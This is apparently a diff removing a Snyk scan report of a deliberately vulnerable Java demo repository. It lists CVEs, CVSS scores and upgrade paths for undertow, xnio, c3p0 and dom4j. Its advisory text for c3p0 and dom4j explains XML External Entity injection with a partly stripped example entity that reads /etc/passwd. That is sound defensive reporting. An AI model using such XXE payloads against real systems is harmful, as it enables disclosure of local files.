"CWE": [ - "CWE-400" - ] - }, - "packageName": "org.jboss.xnio:xnio-api", - "proprietary": false, - "creationTime": "2024-03-06T14:54:57.557703Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-03-05T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.jboss.xnio", - "artifactId": "xnio-api" - }, - "publicationTime": "2024-03-07T06:05:43.052310Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-04-27T13:45:18.043553Z", - 
"socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final", - "org.jboss.xnio:xnio-api@3.8.4.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.33.Final", - "org.jboss.xnio:xnio-api@3.8.16.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.jboss.xnio:xnio-api", - "version": "3.8.4.Final" - } - ], - "ok": false, - "dependencyCount": 12, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": 
"MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "21 vulnerable dependency paths", - "remediation": { - "unresolved": [ - { - "id": "SNYK-JAVA-IOUNDERTOW-7433721", - "title": "Memory Leak", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "low", - "cvssScore": 2.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437", - "title": "Red Hat Bugzilla Bug" - }, - { - "url": "https://access.redhat.com/errata/RHSA-2024:4392", - "title": "Red Hat Security Advisory" - }, - { - "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562", - "title": "Vulnerable Code" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", - "assigner": "Snyk", - "severity": "low", - "baseScore": 2.3, - "cvssVersion": "4.0", - "modificationTime": "2024-07-10T14:39:24.891744Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "low", - "baseScore": 3.1, - "cvssVersion": "3.1", - "modificationTime": "2024-07-10T14:39:24.891744Z" - } - ], - "description": "## 
Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n", - "epssDetails": { - "percentile": "0.16001", - "probability": "0.00045", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-3653" - ], - "CWE": [ - "CWE-401" - ], - "GHSA": [ - "GHSA-ch7q-gpff-h9hp" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2024-07-10T07:43:42.505449Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-07-09T00:31:40Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2024-07-10T14:39:24.891304Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-07-10T14:39:24.891744Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [], - "isUpgradable": false, 
- "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final", - "severityWithCritical": "low" - } - ], - "upgrade": { - "com.unboundid:unboundid-ldapsdk@3.1.1": { - "upgradeTo": "com.unboundid:unboundid-ldapsdk@4.0.5", - "upgrades": [ - "com.unboundid:unboundid-ldapsdk@3.1.1" - ], - "vulns": [ - "SNYK-JAVA-COMUNBOUNDID-32143" - ] - }, - "commons-collections:commons-collections@3.1": { - "upgradeTo": "commons-collections:commons-collections@3.2.2", - "upgrades": [ - "commons-collections:commons-collections@3.1", - "commons-collections:commons-collections@3.1", - "commons-collections:commons-collections@3.1" - ], - "vulns": [ - "SNYK-JAVA-COMMONSCOLLECTIONS-30078", - "SNYK-JAVA-COMMONSCOLLECTIONS-472711", - "SNYK-JAVA-COMMONSCOLLECTIONS-6056408" - ] - }, - "io.undertow:undertow-core@2.2.13.Final": { - "upgradeTo": "io.undertow:undertow-core@2.3.8.Final", - "upgrades": [ - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final", - "org.jboss.xnio:xnio-api@3.8.4.Final", - "org.jboss.xnio:xnio-api@3.8.4.Final", - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final" - ], - "vulns": [ - "SNYK-JAVA-IOUNDERTOW-7433720", - "SNYK-JAVA-IOUNDERTOW-7300152", - "SNYK-JAVA-IOUNDERTOW-7300153", - "SNYK-JAVA-IOUNDERTOW-7361775", - "SNYK-JAVA-ORGJBOSSXNIO-2994360", - "SNYK-JAVA-ORGJBOSSXNIO-6403375", - "SNYK-JAVA-IOUNDERTOW-6567186", - "SNYK-JAVA-IOUNDERTOW-6669948", - "SNYK-JAVA-IOUNDERTOW-3358786", - "SNYK-JAVA-IOUNDERTOW-3339519", - "SNYK-JAVA-IOUNDERTOW-2871356", - "SNYK-JAVA-IOUNDERTOW-3012383", - "SNYK-JAVA-IOUNDERTOW-2391283" - ] - }, - 
"org.apache.logging.log4j:log4j-core@2.15.0": { - "upgradeTo": "org.apache.logging.log4j:log4j-core@2.17.1", - "upgrades": [ - "org.apache.logging.log4j:log4j-core@2.15.0", - "org.apache.logging.log4j:log4j-core@2.15.0", - "org.apache.logging.log4j:log4j-core@2.15.0" - ], - "vulns": [ - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014" - ] - } - }, - "patch": {}, - "ignore": {}, - "pin": {} - }, - "filesystemPolicy": false, - "filtered": { - "ignore": [], - "patch": [] - }, - "uniqueCount": 21, - "projectName": "io.snyk:log4shell-server", - "foundProjectCount": 7, - "displayTargetFile": "log4shell-goof/log4shell-server/pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" - }, - { - "vulnerabilities": [], - "ok": true, - "dependencyCount": 3, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.0": { 
- "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "No known vulnerabilities", - "filesystemPolicy": false, - "uniqueCount": 0, - "projectName": "io.github.snyk:todolist-mvc", - "foundProjectCount": 7, - "displayTargetFile": "todolist-goof/pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" - }, - { - "vulnerabilities": [ - { - "id": "SNYK-JAVA-C3P0-461017", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", - "title": "GitHub Commit" - } - ], - 
"cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:45.369849Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. 
Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", - "epssDetails": { - "percentile": "0.78365", - "probability": "0.00585", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-20433" - ], - "CWE": [ - "CWE-611" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:17:58.383761Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-12-24T13:29:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-07-21T14:22:18Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:09.230623Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "SNYK-JAVA-C3P0-461018", - "title": "Denial of Service (DoS)", - "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://hackerone.com/reports/509315", - "title": "POC: Hackerone Report" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:14.895852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for 
augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", - "epssDetails": { - "percentile": "0.90102", - "probability": "0.02457", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-5427" - ], - "CWE": [ - "CWE-776" - ], - "GHSA": [ - "GHSA-84p2-vf58-xhxv" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:24:58.914446Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-04-22T22:18:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-04-22T22:18:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:53.496388Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", - "type": "license", - "title": "LGPL-3.0 license", - "semver": { - "vulnerable": [ - "[0,)" - ] - }, - "license": "LGPL-3.0", - "language": "java", - "description": "LGPL-3.0 license", - "packageName": "c3p0:c3p0", - "creationTime": "2024-06-18T02:35:42.971Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:35:42.971Z", - "severity": "medium", - 
"severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "SNYK-JAVA-DOM4J-174153", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "credit": [ - "Mario Areias" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/Namespace.java", - "className": "Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/QName.java", - "className": "QName", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/dom4j/dom4j/issues/48", - "title": "GitHub Issue" - }, - { - "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", - "title": "POC: Ihacktoprotect Blog" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": 
"2024-03-11T09:53:54.900402Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:00:55.789489Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", - "epssDetails": { - "percentile": "0.70906", - "probability": "0.00325", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-1000632" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-6pcc-3rfx-4gpm" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2019-04-10T16:07:04.634619Z", - "functions_new": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.QName", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-01T19:12:29Z", - "exploitDetails": { - "sources": [ - "Snyk" - 
], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2018-08-21T14:16:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.900402Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [ - false, - "org.hibernate:hibernate-core@5.1.17.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "dom4j:dom4j", - "version": "1.6.1" - }, - { - "id": "SNYK-JAVA-DOM4J-2812975", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - 